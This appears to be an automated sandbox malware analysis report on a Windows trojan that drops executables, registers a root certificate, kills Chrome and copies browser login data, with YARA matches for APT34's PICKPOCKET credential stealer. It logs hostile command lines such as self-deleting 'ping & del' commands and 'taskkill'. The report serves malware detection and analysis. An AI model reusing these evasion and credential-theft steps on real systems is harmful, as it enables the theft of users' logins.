Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.googletagmanager.com/gtm.js?id=GTM-PZ6TRJB
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: ecv37E8.tmp.9.dr	String found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: 6272167835D47591.exe, 6272167835D47591.exe, 00000004.00000003.272825480.00000000041AC000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000003.272318191.0000000004187000.00000004.00000001.sdmp	String found in binary or memory: https://www.gstatic.com;
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accept:
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/accept:
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/login/nonce/
Source: 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.com/origin:
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	String found in binary or memory: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Source: C:\Users\user\AppData\Roaming\1611970727133.exe

Code function: 9_2_0040AE4D OpenClipboard,

9_2_0040AE4D

E-Banking Fraud:

Registers a new ROOT certificate

Show sources

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

Code function: 2_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,

2_2_1001F720

Spam, unwanted Advertisements and Ransom Demands:

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_00456840 CryptDecodeObject,CryptAcquireContextW,CryptDecodeObject,CryptDecodeObject,CryptDecodeObject,CryptDecodeObject,CryptImportKey,

0_2_00456840

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 2.2.6272167835D47591.exe.3350000.6.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Author: unknown
Source: 4.2.6272167835D47591.exe.32e0000.6.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Author: unknown

PE file has a writeable .text section

Show sources

Source: N1yprTBBXs.exe	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 6272167835D47591.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Roaming\1611970727133.exe	Code function: 9_2_0040C516 NtQuerySystemInformation,		9_2_0040C516
Source: C:\Users\user\AppData\Roaming\1611970727133.exe	Code function: 9_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,		9_2_0040C6FB

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

Code function: 2_2_1001DA70: wsprintfW,CreateFileW,_memset,DeviceIoControl,_memset,CloseHandle,

2_2_1001DA70

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_004DC4D0 CloseHandle,_memset,CreateProcessAsUserW,GetLastError,CloseHandle,AssignProcessToJobObject,GetLastError,CloseHandle,SetThreadToken,ResumeThread,CloseHandle,

0_2_004DC4D0

Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004EFF70	0_2_004EFF70
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004F001D	0_2_004F001D
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00478010	0_2_00478010
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0045E020	0_2_0045E020
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00416030	0_2_00416030
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004510C0	0_2_004510C0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004220D0	0_2_004220D0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004390A0	0_2_004390A0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00502169	0_2_00502169
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0041F1E0	0_2_0041F1E0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004731E0	0_2_004731E0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0043D2D0	0_2_0043D2D0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0042B2A0	0_2_0042B2A0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00460360	0_2_00460360
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004B2370	0_2_004B2370
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0041C3F0	0_2_0041C3F0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0047A410	0_2_0047A410
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004714E0	0_2_004714E0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0046F4B0	0_2_0046F4B0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0043E540	0_2_0043E540
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0048E560	0_2_0048E560
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0045D570	0_2_0045D570
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0044A520	0_2_0044A520
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00423530	0_2_00423530
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0042F530	0_2_0042F530
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00466530	0_2_00466530
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004315E0	0_2_004315E0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004B3660	0_2_004B3660
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004B5670	0_2_004B5670
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_0042E630	0_2_0042E630
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004B66D0	0_2_004B66D0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004286E0	0_2_004286E0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_004166B0	0_2_004166B0
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: 0_2_00493790	0_2_00493790
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1000C063	2_2_1000C063
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1000B883	2_2_1000B883
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_100060F0	2_2_100060F0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_100169BD	2_2_100169BD
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_100099E0	2_2_100099E0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_100071F0	2_2_100071F0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10009257	2_2_10009257
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10010AED	2_2_10010AED
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10008340	2_2_10008340
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1000E380	2_2_1000E380
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1000ABA0	2_2_1000ABA0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1000B3B0	2_2_1000B3B0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1001EBD0	2_2_1001EBD0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_100083F0	2_2_100083F0
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1000BC57	2_2_1000BC57
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1000C483	2_2_1000C483
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_10010590	2_2_10010590
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1001EDDB	2_2_1001EDDB
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: 2_2_1000FF71	2_2_1000FF71
Source: C:\Users\user\AppData\Roaming\1611970727133.exe	Code function: 9_2_00404BE4	9_2_00404BE4
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 25_2_00B1A0C3	25_2_00B1A0C3
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 25_2_00B1963B	25_2_00B1963B
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 25_2_00B16A1E	25_2_00B16A1E
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 25_2_00B1A7BB	25_2_00B1A7BB
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 25_2_00B1B51C	25_2_00B1B51C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 25_2_00B19B7F	25_2_00B19B7F

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 2870F899F2E9EC540DA321F603CFB1A735DCD06DF016718E663DC78FEFDF5E0A

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Code function: String function: 10010534 appears 35 times
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: String function: 004854D0 appears 55 times
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: String function: 004EE38E appears 73 times
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Code function: String function: 00407D80 appears 146 times

Source: N1yprTBBXs.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: N1yprTBBXs.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: N1yprTBBXs.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: N1yprTBBXs.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: N1yprTBBXs.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: N1yprTBBXs.exe	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6272167835D47591.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6272167835D47591.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6272167835D47591.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6272167835D47591.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6272167835D47591.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 6272167835D47591.exe.0.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1611970727133.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1611970727133.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: N1yprTBBXs.exe, 00000000.00000002.267691642.0000000002BD0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dllj% vs N1yprTBBXs.exe
Source: N1yprTBBXs.exe, 00000000.00000002.268393285.0000000002BE0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs N1yprTBBXs.exe
Source: N1yprTBBXs.exe, 00000000.00000002.268416247.0000000002C30000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamemswsock.dll.muij% vs N1yprTBBXs.exe

Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior

Source: N1yprTBBXs.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: 00000004.00000002.278675442.0000000002730000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000002.350264468.0000000002880000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000000.00000002.264281682.0000000002750000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.N1yprTBBXs.exe.2750000.2.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.N1yprTBBXs.exe.2750000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.6272167835D47591.exe.10000000.7.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.6272167835D47591.exe.2880000.4.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.6272167835D47591.exe.2730000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.6272167835D47591.exe.10000000.7.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.6272167835D47591.exe.2880000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.N1yprTBBXs.exe.10000000.6.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.6272167835D47591.exe.2730000.5.unpack, type: UNPACKEDPE	Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.6272167835D47591.exe.3350000.6.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 4.2.6272167835D47591.exe.32e0000.6.unpack, type: UNPACKEDPE	Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html

Source: classification engine

Classification label: mal93.bank.troj.spyw.evad.winEXE@32/37@4/2

Source: C:\Users\user\AppData\Roaming\1611970727133.exe

Code function: 9_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,

9_2_0040CE93

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_00469760 CoCreateInstance,

0_2_00469760

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Code function: 0_2_0043D110 FindResourceW,LoadResource,LockResource,SizeofResource,_memmove,VerQueryValueW,FreeLibrary,

0_2_0043D110

Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

File created: C:\Users\user\AppData\Local\Login Data1611970726180

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6724:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_01
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

File created: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe

Jump to behavior

Source: N1yprTBBXs.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Roaming\1611970727133.exe

System information queried: HandleInformation

Jump to behavior

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")

Source: C:\Windows\SysWOW64\msiexec.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\N1yprTBBXs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 6272167835D47591.exe, 00000002.00000002.353440614.000000000351C000.00000004.00000001.sdmp, 6272167835D47591.exe, 00000004.00000002.280686595.00000000034AC000.00000004.00000001.sdmp	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

Source: N1yprTBBXs.exe	Virustotal: Detection: 38%
Source: N1yprTBBXs.exe	Metadefender: Detection: 18%
Source: N1yprTBBXs.exe	ReversingLabs: Detection: 59%

Source: N1yprTBBXs.exe

String found in binary or memory: GETpinyinhttp://tools.google.com/pinyin/install.htmlhttp://tools.google.com/pinyin/uninstall.htmlsysdictpinyinversion:http://tools.google.com/service/updatesysdicthttps://tools.google.com/service/updateGooglePinyinUpdaterTrayIconpinyinpinyinsysdictGooglePinyinDict.exesysdictuserdictmodel

Source: C:\Users\user\Desktop\N1yprTBBXs.exe

File read: C:\Users\user\Desktop\N1yprTBBXs.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\N1yprTBBXs.exe 'C:\Users\user\Desktop\N1yprTBBXs.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 0011 user01
Source: unknown	Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0B37D2846804C02059732A6A10D93625 C
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 200 user01
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\N1yprTBBXs.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown	Process created: C:\Users\user\AppData\Roaming\1611970727133.exe 'C:\Users\user\AppData\Roaming\1611970727133.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970727133.txt'
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\6272167835D47591.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'	Jump to behavior
Source: C:\Users\user\Desktop\N1yprTBBXs.exe	Process created: C:\Users\user\AppData\Local\Temp\6272167835D47591.exe C:\Users\user\AppData\Local\Temp\6272167835D47591.exe 0011 user01	Jump to behavior
